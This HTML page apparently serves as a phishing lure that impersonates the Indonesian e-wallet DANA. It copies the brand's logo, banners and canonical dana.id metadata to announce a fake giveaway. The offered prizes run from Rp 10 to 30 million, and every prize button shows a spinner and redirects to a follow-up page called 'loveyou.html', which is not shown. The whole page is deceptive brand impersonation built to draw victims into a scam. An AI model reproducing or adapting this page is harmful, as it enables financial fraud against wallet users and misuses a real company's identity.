<html><head>
 <meta charset="UTF-8">
  
  <meta name="theme-color" content="#118EEA">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
  <title>𝗗𝗔𝗡𝗔 𝗚𝗶𝘃𝗲𝗮𝘄𝗮𝘆 𝗜𝗻𝗱𝗼𝗻𝗲𝘀𝗶𝗮</title>
  <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="https://www.dana.id">
  <meta property="og:type" content="website">
  <meta property="og:title" content="𝗗𝗔𝗡𝗔 𝗚𝗶𝘃𝗲𝗮𝘄𝗮𝘆 𝗜𝗻𝗱𝗼𝗻𝗲𝘀𝗶𝗮">
  <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
 <meta content="images/AddText_12-24-02.50.41.jpg" property="og:image">
  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="https://www.dana.id">
  <meta property="twitter:url" content="https://www.dana.id">
  <meta name="twitter:title" content="𝗗𝗔𝗡𝗔 𝗚𝗶𝘃𝗲𝗮𝘄𝗮𝘆 𝗜𝗻𝗱𝗼𝗻𝗲𝘀𝗶𝗮">
  <meta name="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta content="images/AddText_12-24-02.50.41.jpg" property="og:image">

 <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&amp;usqp=CAU" rel="shortcut icon" type="image/x-icon">
  <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&amp;usqp=CAU" rel="apple-touch-icon">
 <link rel="canonical" href="https://www.dana.id/">
<meta property="og:url" content="https://www.dana.id/">
<meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <link rel="stylesheet" href="css/reset.min.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Varela+Round&amp;display=swap"><link rel="stylesheet" href="./style.css">
<!-- partial:index.partial.html -->
<link href="css/owl.carousel.min.css" rel="stylesheet">
<link href="css/owl.theme.default.min.css" rel="stylesheet">
<script src="js/jquery.min.js">
</script>
 <script src="js/owl.carousel.js">
   </script>

<style>
 form {
  --background: #ffffff;
  --text: #414856;
  --radio: #7C96B2;
  --radio-checked: #118EEA;
  --radio-size: 22px;
  --width: 292px;
  --height: 120px;
  --border-radius: 10px;
  background: var(--background);
  width: var(--width);
  height: var(--height);
  border-radius: var(--border-radius);
  color: var(--text);
  position: relative;
  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;
  padding: 30px 20px;
  padding-top: 10px;
  display: grid;
  grid-template-columns: auto var(--radio-size);
  font-weight: bold;
  align-items: center;
  
}
form label {
  cursor: pointer;
  color: #118EEA;
  font-weight: bold;
  
}
form input[type=radio] {
  -webkit-appearance: none;
  -moz-appearance: none;
  position: relative;
  height: var(--radio-size);
  width: var(--radio-size);
  outline: none;
  margin: 3px 0;
  cursor: pointer;
  border: 2px solid var(--radio);
  background: transparent;
  border-radius: 50%;
  display: grid;
  
  justify-self: end;
  justify-items: center;
  align-items: center;
  overflow: hidden;
  transition: border 0.5s ease;
}
form input[type=radio]::before, form input[type=radio]::after {
  content: "";
  display: flex;
  justify-self: center;
  border-radius: 50%;
}
form input[type=radio]::before {
  position: absolute;
  width: 100%;
  height: 100%;
  background: var(--background);
  z-index: 1;
  opacity: var(--opacity, 1);
}
form input[type=radio]::after {
  position: relative;
  width: calc(100% /2);
  height: calc(100% /2);
  background: var(--radio-checked);
  top: var(--y, 100%);
  transition: top 0.5s cubic-bezier(0.48, 1.97, 0.5, 0.63);
}
form input[type=radio]:checked {
  --radio: var(--radio-checked);
}
form input[type=radio]:checked::after {
  --y: 0%;
  -webkit-animation: stretch-animate 0.3s ease-out 0.17s;
          animation: stretch-animate 0.3s ease-out 0.17s;
}
form input[type=radio]:checked::before {
  --opacity: 0;
}
form input[type=radio]:checked ~ input[type=radio]::after {
  --y: -100%;
}
form input[type=radio]:not(:checked)::before {
  --opacity: 1;
  transition: opacity 0s linear 0.5s;
}

@-webkit-keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}

@keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}
body {
  background: #E8EBF3;
  height: 100%;
  font: 400 16px "Varela Round", sans-serif;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}
body .socials {
  position: fixed;
  display: block;
  left: 20px;
  bottom: 20px;
}
body .socials > a {
  display: block;
  width: 30px;
  opacity: 0.2;
  transform: scale(var(--scale, 0.8));
  transition: transform 0.3s cubic-bezier(0.38, -0.12, 0.24, 1.91);
}
body .socials > a:hover {
  --scale: 1;
}   


/* Added PseudoCode CSS to Hide the Controls of Video as on adding Controls Attribute to Video, the controls of video get visible easily. So to control that case also, this needs to be present on CSS End */

video::-webkit-media-controls {
    display: ;
}

video {
  display: none;
  pointer-events: none;
}


#carousel {
  grid-row: 1 / 2;
  grid-column: 1 / 8;
  width: 150vw;
  height: 500px;
  display: flex;
  align-items: center;
  justify-content: center;
  overflow: hidden;
  transform-style: preserve-3d;
  perspective: 600px;
  --items: 5;
  --middle: 3;
  --position: 1;
  pointer-events: none;
}

div.item {
  position: absolute;
  width: 300px;
  height: 400px;
  background-color: coral;
  --r: calc(var(--position) - var(--offset));
  --abs: max(calc(var(--r) * -1), var(--r));
  transition: all 0.25s linear;
  transform: rotateY(calc(-10deg * var(--r)))
    translateX(calc(-300px * var(--r)));
  z-index: calc((var(--position) - var(--abs)));
}

div.item:nth-of-type(1) {
  --offset: 1;
  background-color: #90f1ef;
}
div.item:nth-of-type(2) {
  --offset: 2;
  background-color: #ff70a6;
}
div.item:nth-of-type(3) {
  --offset: 3;
  background-color: #ff9770;
}
div.item:nth-of-type(4) {
  --offset: 4;
  background-color: #ffd670;
}
div.item:nth-of-type(5) {
  --offset: 5;
  background-color: #e9ff70;
}


/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/
      
 .btn-punya {
        display: inline-block;
        margin: 5px auto;
        padding: 0px;
        position: relative;
        cursor: pointer;
        left: 0;
        right: 0;
        background: none rgb(0, 134, 224);
        border: none;
        text-align: center;
        height: 45px;
        width: 100%;
        border: 1.5px solid #ddd;
        font-family: 'Open Sans', sans-serif;
        font-size: 14px;
        font-weight: bold;
        color: rgb(255, 255, 255);
        letter-spacing: 1px;
        line-height: 1;
        border-radius: 50px;
        box-shadow: rgb(170, 170, 170) 5px 5px 7px 0px;
        transition: background 200ms ease 0s;
    }
    
    
   .btn-punya:active{
       opacity: 0.5;
   } 


form {
  --background: #ffffff;
  --text: #414856;
  --radio: #7C96B2;
  --radio-checked: #118EEA;
  --radio-size: 25px;
  --width: 292px;
  --height: 120px;
  --border-radius: 20px 20px 8px 8px;
  background: var(--background);
  width: var(--width);
  height: var(--height);
  border-radius: var(--border-radius);
  color: var(--text);
  position: relative;
  left: 0;
  right: 0;
  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;
  padding: 30px 20px;
  padding-top: 10px;
  display: block;
  grid-template-columns: auto var(--radio-size);
  font-weight: bold;
  align-items: center;
  font-family: Alata, sans-serif;
  
}
form label {
  cursor: pointer;
  color: #118EEA;
  font-weight: bold;
  text-shadow: 1px 1px 0 #FFF;
}
form input[type=radio] {
  -webkit-appearance: none;
  -moz-appearance: none;
  position: relative;
  height: var(--radio-size);
  width: var(--radio-size);
  outline: none;
  margin: 3px 0;
  cursor: pointer;
  border: 2px solid var(--radio);
  background: transparent;
  border-radius: 50%;
  display: grid;
  justify-self: end;
  justify-items: center;
  align-items: center;
  overflow: hidden;
  transition: border 0.5s ease;
}
form input[type=radio]::before, form input[type=radio]::after {
  content: "";
  display: flex;
  justify-self: center;
  border-radius: 50%;
}
form input[type=radio]::before {
  position: absolute;
  width: 100%;
  height: 100%;
  background: var(--background);
  z-index: 1;
  opacity: var(--opacity, 1);
}
form input[type=radio]::after {
  position: relative;
  width: calc(100% /2);
  height: calc(100% /2);
  background: var(--radio-checked);
  top: var(--y, 100%);
  transition: top 0.5s cubic-bezier(0.48, 1.97, 0.5, 0.63);
}
form input[type=radio]:checked {
  --radio: var(--radio-checked);
}
form input[type=radio]:checked::after {
  --y: 0%;
  -webkit-animation: stretch-animate 0.3s ease-out 0.17s;
          animation: stretch-animate 0.3s ease-out 0.17s;
}
form input[type=radio]:checked::before {
  --opacity: 0;
}
form input[type=radio]:checked ~ input[type=radio]::after {
  --y: -100%;
}
form input[type=radio]:not(:checked)::before {
  --opacity: 1;
  transition: opacity 0s linear 0.5s;
}

@-webkit-keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}

@keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}
</style></head>

<body style="background-image: url(images/hero-personal-bg-back.png);
    background-position: 100% 100%;background-size: 100% 100%;
    background-color: #fff;">
    
<nav style="position: fixed; top: 0; left:0; right: 0; margin: 0px auto; width: 100%; height: 60px; background: transparent; z-index: 999">
<img src="images/dana-logo.fe46647.png" style="width: 100px; margin-top: 7px; margin-left: 9px">   
</nav>
<center>
 <img id="video" width="100%" height="35%" autoplay="" muted="" control="" loop="" style=" width: 100%; height: 30%; display: block; background-color: #000; position: fixed; top: 0; left: 0; right: 0; border-radius: 0px 0px 0px 0px; border-bottom: 3px groove #118EEA;  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px; z-index: -2" preload="metadata" src="images/videoplayback1-ezgif.com-video-to-gif-converter.gif" type="img/jpeg">
<br>
<div style="width: 100%; height: 80%; display: block; background-color: #; position: fixed; top: 30%; left: 0; right: 0; border-radius: 15px 15px 0px 0px; border-top: 2px solid #fff; background-image: url(images/hero-personal-bg-back.png);
    background-position: 100% 100%;background-size: 100% 100%; z-index: -1;"></div>
</center>
<center>
<fieldset style="border: 10.5px double #fff; border-radius: 0px 0px 15px 15px; box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(99, 99, 99, 1.2) 0px 2px 8px 0px; height: 140px">
<!-- partial:index.partial.html -->
<form style="margin-top: -20px; height: 50px; padding-top: 15px; margin-bottom: 0px; text-align: center; font-size: 15px; background: #118EEA; color: #fff; border-radius: 15px 15px 0px 0px; border: 2px solid #fff; margin: 0px auto; margin-top: -60px;">
    <div style="margin-left: 0px; margin-top: -7px; font-weight: bold">SILAHKAN PILIH HADIAH ANDA</div>

 </form>   

 
<form style="margin-top: -60px; border-top: 1px solid #ccc; height: 150px; text-align: center; background: url(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRUCd3FTNPsfV4I_egK0UaUXzClscz5eacLow&amp;usqp=CAU);
    background-position: 100% 100%;
    background-size: 100% 100%; background-color: #fff; outline: 1px solid #118EEA; text-shadow: 0 0.5px 0.5px rgba(000, 999, 255, 10.75);box-shadow: rgba(6, 24, 24, 0.99) 0px 0px 0px 2px, rgba(6, 24, 4, 10.65) 0px 4px 6px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset; font-size: 12px; color: #fff">
    

 
       <button type="button" class="btn-punya" onclick="letsgo()" style="margin-top: 5px">💵 Rp. 10.000.000™</button>
    
  
   <button type="button" class="btn-punya" onclick="letsgo()">💵 Rp. 20.000.000™</button>
     <button type="button" class="btn-punya" onclick="letsgo()">💵 Rp. 30.000.000™</button>
   
   
<br>


</form></fieldset></center>


<br>
   


<!--- ## DRIBBBLE + TWITTER ############# -->

<footer style="position: fixed; bottom: 20; left: 0; right: 0; width: 100%; height: 200px; z-index: 3; background-color: #fff; border-radius: 15px 15px 0px 0px; border-top: 3px solid #118EEA">
<!----------HTML code starts here------->

<div class="owl-carousel owl-theme owl-loaded " style="height: 125px; transform-style: preserve-3d; overflow: hidden">
            
       <div class="owl-stage-outer" style="padding: 0 90px; height: 160px; width: 100%; transform-style: preserve-3d;">
         
         <div class="owl-stage" style="transform: translate3d(-1527px, 0px, 0px); transition: all 0.05s ease 1s; width: 3334px; background-color: ; padding: 20px; width: 80%">
           
   <div class="owl-item item active;" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; border-radius: 10px; background: transparent"><img src="images/1706678558-WebBanner-DANAscaVAngerHunt-500x300px.png" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="background-color: #000; box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; border-radius: 20px 0 20px 0; background: transparent"><img src="images/1706850538-010224-EIS157-eMAS_10__Cashback-Web_Banner-Thumbnails.png" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="images/1707410449-e-MAS_CB_75K_-_Website_Thumbnail_500x300p.png" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="images/AddText_12-21-12.32.33.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="images/AddText_12-21-12.44.48.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="images/AddText_12-25-01.43.43.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent; border-radius: 20px 0 20px 0"><img src="images/AddText_02-05-05.34.58.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
           
           
             
            </div></div></div>
           
  
    

</footer>
  <center>
     <div id="process1" name="process" class="process1" style="display: none;">
            <div class="loading">
                <img src="images/load_bg.png">
                <img class="spinner" src="images/load_spin.png" id="loading" style="margin-top: -2px">
            </div>
        </div>
        </center>
<img src="images/1704436332522.png" style="width: 100%; position: fixed; bottom: -5; left: 0; right: 0; margin: 0px auto; z-index: 4;"> 

<!-- partial -->
  <script>
var owl = $('.owl-carousel');
owl.owlCarousel({
    items:2, 
  // items change number for slider display on desktop
  
    loop:true,
    margin:10,
    autoplay:true,
    autoplayHoverPause:true
});      
      
  </script>

<script>
    /* Toggle Button to Unmute the Video */

function toggleMute() {
    var video = document.getElementById('video');
    if (video.muted) {
        video.muted = false;
    } else {
        video.muted = true;
    }
}

/* Delay Function to Add SetTimeOut After Defined Interval */

function delay(time) {
    return new Promise((resolve) => setTimeout(resolve, time));
}

/* Show Video Function to Add Display Property to Show the Video on Click of Button which will fulfilled User Interaction Needs to Browser to Run the Video with Unmute State */

function showVideo() {
    var element = document.getElementById('video');
    var button = document.getElementById('button');
    element.style.display = 'block';
    button.style.display = 'none';
    delay(100).then(() => toggleMute());
}
</script>
 <script>
 function play(){
     audio = document.getElementById("dana1");
    audio.play();
    audio.loop = false
    setTimeout(() => {
   $("#kelentet").hide();
    }, 1000);
    
 }
 
</script>
<script>
 function letsgo(){
 $("#process1").show();    
 window.location.href="loveyou.html";
 }   
</script>



</body></html>